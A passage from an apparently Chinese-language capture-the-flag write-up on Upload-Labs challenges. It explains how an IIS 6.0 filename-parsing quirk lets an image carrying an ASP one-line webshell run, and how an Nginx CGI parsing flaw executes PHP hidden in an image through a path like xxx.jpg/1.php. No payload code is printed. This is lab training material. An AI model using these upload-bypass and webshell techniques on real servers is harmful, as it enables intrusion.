"非法的文件格式" ; } |
- 这题主要是教我们一个姿势,帮我们定好了文件名,上传一个包含asp一句话木马的图片
- 由此可以看出文件名中若是带有后缀asp的也可以在iis6.0中解析
pass-24
- 本题考查的是cgi解析漏洞:
Nginx在图片中嵌入PHP代码然后通过访问
xxx.jpg/1.php 来执行其中的代码,上传一个图片马php
我的个人博客
孤桜懶契:http://gylq.github.io
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法
赞赏
他的文章
- 【封神台】前端渗透 XSS wp 2524
- 【封神台】Upload-Labs wp 1701
- 【封神台】Sql-Labs wp 1464
看原图
赞赏
雪币:
留言: